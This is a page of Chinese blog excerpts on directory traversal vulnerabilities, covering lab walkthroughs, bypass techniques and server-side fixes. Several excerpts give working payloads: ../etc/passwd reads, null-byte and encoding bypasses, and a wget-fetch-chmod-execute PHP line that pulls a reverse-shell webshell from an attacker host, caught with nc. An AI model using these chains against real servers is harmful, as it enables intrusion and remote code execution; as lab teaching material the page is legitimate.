精华内容
下载资源
问答
  • web安全目录遍历漏洞学习及绕过

    千次阅读 2020-09-08 21:54:56
    本文目录目录遍历漏洞介绍一些绕过方式防御如何利用目录遍历上传shell并拿到一个低权限 目录遍历漏洞介绍 路径遍历攻击(也称为目录遍历)是指在访问储存在web根目录文件夹之外的文件和目录。通过操纵带有“点-斜线...

    本文首发:FreeBuf

    原文地址:web安全目录遍历漏洞学习及绕过

    目录遍历漏洞介绍

    路径遍历攻击(也称为目录遍历)是指在访问储存在web根目录文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。

    需要注意的是,系统操作访问控制(如在微软windows操作系统上锁定或使用文件)限制了对文件的访问权限。

    这种攻击也称为 “点-点斜线”、“目录遍历”、“目录爬升”和“回溯”。

    搭建一个存在目录遍历漏洞的虚拟机,做个实验。
    使用Owasp zap进行漏洞扫描,挖掘漏洞。
    m0re
    然后复制它的URL到浏览器查看该漏洞
    m0re
    目录遍历的漏洞通过../../../这样的形式来进行目录读取服务器中的文件,../../../../越多多好,因为在终端中,../是返回上一级目录,到根目录使用../会返回当前页面。
    m0re
    一般发现目录遍历的漏洞的探针,也就是测试的时候往往是使用这样的payload

    http://www.xxxx.com/xxx.php?page=../../../../../../../../../../../../../etc/passwd
    

    看是否会返回该文件的内容,这就造成了目录遍历的漏洞产生。
    还可以本地利用PHP环境搭建一个读取文件的脚本。来实现目录遍历。

    <?php
    $dir_path=$_REQUEST['path'];
    $page=scandir($dir_path);
    var_dump($page);
    ?>
    

    一些绕过方式

    1. 加密参数传递的数据
      有的网站程序传递参数后会进行base64加密(当然也会有其他加密),导致我们传递的参数无法解析,所以就无法利用目录遍历,而绕过方式也很简单,就是先对参数进行base64加密后再进行传参。如:?page=bTByZS50eHQ=
    2. 编码绕过
      进行传参时将参数进行编码,实现绕过,比如URL编码。?page=%6D%30%72%65%2E%74%78%74
    3. 目录限定绕过
      有些Web应用程序是通过限定目录权限来分离的。可以使用一些特殊的符号~来绕过。比如提交这样的xxx.php?page=~/../boot。就可以直接跳转到硬盘目录下。
    4. 绕过文件后缀过滤
      一些Web应用程序在读取文件前,会对提交的文件后缀进行检测,攻击者可以在文件名后放一个空字节的编码,来绕过这样的文件类型的检查。
      比如:../../../../boot.ini%00.jpg,Web应用程序使用的Api会允许字符串中包含空字符,当实际获取文件名时,则由系统的Api会直接截短,而解析为../../../../boot.ini
      在类Unix的系统中也可以使用Url编码的换行符,例如:../../../etc/passwd%0a.jpg如果文件系统在获取含有换行符的文件名,会截短为文件名。也可以尝试%20,例如: ../../../index.php%20
    5. 绕过来路验证

    Http Referer : HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的
    在一些Web应用程序中,会有对提交参数的来路进行判断的方法,而绕过的方法可以尝试通过在网站留言或者交互的地方提交Url再点击或者直接修改Http Referer即可,这主要是原因Http Referer是由客户端浏览器发送的,服务器是无法控制的,而将此变量当作一个值得信任源是错误的。

    还有就是web服务器配置不当而造成的目录遍历漏洞,
    可以使用谷歌语法进行查找。

    intitle: index of
    

    随便选择一个打开就是了。
    m0re

    防御

    可以对提交的参数进行多次编码或者多种加密。上面的几种绕过方式进行组合使用。

    如何利用目录遍历上传shell并拿到一个低权限

    利用目录遍历漏洞获取shell思路

    • 上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell。在kali linux中获取反弹shell;
      需要和其他知识相结合,这里直接略过简单步骤
      略过的操作:探测敏感目录,弱口令登录,查找利用的webshell上传点。
      使用/usr/share/webshells/php中的反弹的webshell
      将webshell中的IP和要监听的端口改一下
    $ip = '10.0.2.4';  // CHANGE THIS
    $port = 4444;       // CHANGE THIS
    

    然后进行利用,建数据库数据表,
    m0re
    然后插入字段
    写入<?php system("cd /tmp;wget http://10.0.2.4:8000/webshell.php;chmod +x webshell.php;php webshell.php");?>
    解析:切换至tmp目录,然后在kali的服务器中下载webshell,然后赋给文件执行权限,再执行。
    m0re

    可以看到已经写入了数据。插入了命令
    创建服务器用来让靶场下载webshell
    同时开启nc侦听端口
    m0re
    上面这都是前置设置,这些设置完成后,就可以执行目录遍历漏洞下载并执行shell了
    /usr/databases/shell.php这个是命令所在的文件,使用目录遍历漏洞访问并执行。
    payload

    http://10.0.2.5/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fdatabases%2Fshell.php
    

    拿到一个较低权限的shell
    m0re
    如何将此类低权限提升至root权限。我另写了一篇是关于www-data提权的文章。

    展开全文
  • 什么是目录遍历漏洞 目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的...

    一. 什么是目录遍历漏洞

    目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。

    二. 目录遍历漏洞原理

    程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。

    整改方法

    1.Tomcat

    修改conf/web.xml

    将true 改为false 重启tomcat即可

    2.apache

    1、在服务器端,打开Apache配置文件C:\Program Files\phpStudy\Apache\conf\httpd.conf 

      2、在httpd.conf文件中找到   Options +Indexes +FollowSymLinks +ExecCGI  并修改成   Options -Indexes+FollowSymLinks +ExecCGI  并保存;

      技术分享图片

      3、重新启动phpstudy

    展开全文
  • 目录遍历漏洞

    千次阅读 2021-01-04 20:42:37
    目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是...

    在开始之前,先介绍一下目录遍历漏洞的原理
    目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是unicode编码等。

    靶机

    链接:https://pan.baidu.com/s/1rkcs2rhBPch3Q5beSZJ4Rg
    提取码:20td

    漏洞复现过程

    1. 使用netdiscover发现存活主机
    netdiscover -i eth0
    

    在这里插入图片描述

    1. 使用nmap进行服务探测
    nmap -sV 172.20.10.9
    

    在这里插入图片描述

    1. 使用nmap时并没有发现有明显的可利用漏洞,因此使用OWSAP_ZAP进行web漏洞扫描
    • 使用OWSAP_ZAP时发现目标网站存在目录遍历漏洞
    • 访问目标的URL地址,得到以下信息
      在这里插入图片描述
      在这里插入图片描述
    • 不难发现,页面返回的是/etc/passwd的秘密文件信息
    1. 使用dirb进行目录挖掘
    dirb http://172.20.10.9
    
    • 发现了dbadmin后台数据库,尝试使用admin密码登录成功
    • 若在实战中尝试失败,可以利用sql-post注入等使用sqlmap进行密码爆破
      在这里插入图片描述
      在这里插入图片描述
    1. 进入数据库后,点击创建一个shell.php数据库
      在这里插入图片描述
      在这里插入图片描述
    2. 生成一个php的shellcode代码,用于反弹网站的webshell
    cd /usr/share/webshells/php
    cp php-reverse-shell.php /root/Desktop/shell.php
    
    • 编辑shellcode.php文件,IP地址设置为本机ip,端口为自己想要侦听的端口
      在这里插入图片描述
    1. 完善数据库信息,在Default Value值出填入以下代码用于执行shellcode
      在这里插入图片描述
    • 要在Default Value填入的字段
    <?php system("cd /tmp;wget http://172.20.10.7:8000/shellcode.php;chmod +x shell.php;php shell.php);"?>
    
    1. 使用python快速搭建一个http的web服务,默认开启的是8000端口
    python -m "SimpleHTTPServer"
    
    1. 使用nc命令监听4444端口
    nc -nlvp 4444
    
    1. 将最后的etc%2Fpasswd字段值替换为/usr/databases/shell.php即可反弹webshell
      在这里插入图片描述
    • 反弹成功
      在这里插入图片描述
    1. 使用python命令优化终端
    python -m "import pty; pty.spawn('/bin/bash')"
    
    • 成功获取www-data用户权限
      在这里插入图片描述
    展开全文
  • 服务器漏洞——目录遍历

    千次阅读 2018-10-21 13:00:47
    目录遍历.概念】 由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的...

    目录遍历.概念
    由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。
    原理
    指程序中未过滤用户输入的…/和./之类的目录跳转符,导致恶意用户可以 通过提交目录跳转来遍历服务器上的任意文件。

    展开全文
  • 漏洞之目录遍历漏洞

    千次阅读 2020-01-10 16:36:30
    目录遍历漏洞 目录遍历, 也叫路径遍历,由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件 ...
  • 攻防:目录遍历漏洞简介

    千次阅读 2019-09-27 15:29:55
    2014年3月22日,乌云漏洞报告平台爆出国内某著名网站存在漏洞,安全支付日志可被遍历下载,该事件在网络中迅速扩散,让用户意识到了目录浏览和目录遍历漏洞巨大的危害性,目录遍历这个古老的漏洞再次成为网络热点。...
  • Web安全-目录遍历漏洞

    千次阅读 2019-12-17 23:29:27
    先上一张图看看什么是目录遍历漏洞: 对,目录遍历就长成这样子。 一般遇到目录遍历漏洞,我们常做的就是去寻找有价值的东西去下载,比如数据库: 一般是没有index.php就可能出现像这样的一个目录遍历的漏洞,...
  • 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,...
  • 概述 在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。 当用户发起一个前端的请求时,便会将请求的这个... 从而导致后台服务器上其他目录的文件结果被遍历出来,形成...
  • 渗透测试——目录遍历漏洞

    千次阅读 2020-04-03 11:51:26
    QQ 1274510382 Wechat JNZ_aming 商业互捧 QQ群538250800 技术搞事 QQ群599020441 技术合作 QQ群152889761 ...Web应用程序一般会有对服务器的文件读取查看的功能 大多会用到提交的参数来指明文件名 形如...
  • CTF-目录遍历漏洞

    2021-08-06 16:44:40
    原理:当客户端访问到一个目录时,Apache服务器...3.使用AWVS扫描网站,有个目录遍历漏洞,根据漏洞详情在地址栏输入地址得到passwd的内容,说明这个漏洞可行 3.这样就可以上传webshell,用目录遍历的方式启...
  • 目录遍历漏洞详解

    万次阅读 2017-07-13 16:45:49
    目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。  Web服务器主要提供两个级别的安全机制:  访问控制列表——就是我们常说的ACL  根目录...
  • 目录遍历漏洞讲解(IIS、Apache)

    千次阅读 2019-10-20 15:08:23
    目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意文件,甚至执行系统命令。 IIS IIS目录...
  • (七)目录遍历漏洞

    2021-04-13 21:05:29
    目录遍历(也称为文件路径遍历)是一个Web安全漏洞,它使攻击者可以读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的凭据以及敏感的操作系统文件。在某些情况下,攻击者可能能够...
  • 目录遍历漏洞原理及其防御方法

    万次阅读 2019-03-19 21:11:47
    目录遍历漏洞原理 目录遍历(路径遍历)是由于Web服务器或者Web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件...
  • Apache目录遍历漏洞

    2020-10-21 12:27:05
    目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一-种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外...
  • tomcat目录遍历漏洞的防范

    千次阅读 2019-09-30 13:04:47
    会给站点带来相当大的隐患,目录遍历漏洞,会将站点的所有目录暴露在访问者眼前,有经验的开发者或hacker们可以从 这些目录得知当前站点的信息,如开发语言、服务器系统、站点结构,甚至一些敏感的信息。 apache...
  • 目标网站存在目录遍历漏洞

    千次阅读 2019-03-08 09:33:28
    产生原因: 应用程序开启了目录浏览 解决办法: 对IIS管理器中的 功能视图》目录浏览 设置为禁用状态。
  • 解析漏洞格式:/test.jpg/test.php服务器接收到此参数时,由于php.ini文件设置问题和nginx特性会按照php文件进行且不检查文件是否存在就进行解析。 复现环境 Nginx1.11.5+php25.2.17 解析漏洞复现 在网站根目录...
  • 目录遍历的定义 路径遍历攻击(也称为目录遍历)是指在访问储存在web根目录文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统...
  • 文章目录漏洞描述环境搭建步骤一:linux下安装docker步骤二:搜索nginx镜像拉nginx镜像运行docker并检测nginx环境...Nginx的目录遍历漏洞与Apache的一样,都是配置方面的问题。默认配置的话是不会开启目录遍历的。...
  • 3.目录遍历漏洞验证 4.目录遍历漏洞修复 (1)IIS中间件 (2)Apache中间件 (3)Nginx中间件 (4)Tomcat中间件 (5)Weblogic中间件 1.前言 前几天在对目标网站进行安全性测试时,发现了目录浏览漏洞。...
  • 从而导致后台服务器上其他目录的文件结果被遍历出来,形成目录遍历漏洞。 看到这里,你可能会觉得目录遍历漏洞和不安全的文件下载,甚至文件包含漏洞有差不多的意思,是的,目录遍历漏洞形成的最主要的原因跟这两者...
  • 在nginx中开启autoindex,配置不规范而造成目录遍历漏洞 配置如下: server { listen 80; server_name *.*.*.*; index index.htm index.html; root /home/wwwroot/www; access_log off; location ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 9,399
精华内容 3,759
关键字:

服务器目录遍历漏洞